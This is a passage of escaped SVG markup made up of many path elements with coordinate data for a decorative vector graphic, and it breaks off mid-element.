d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path 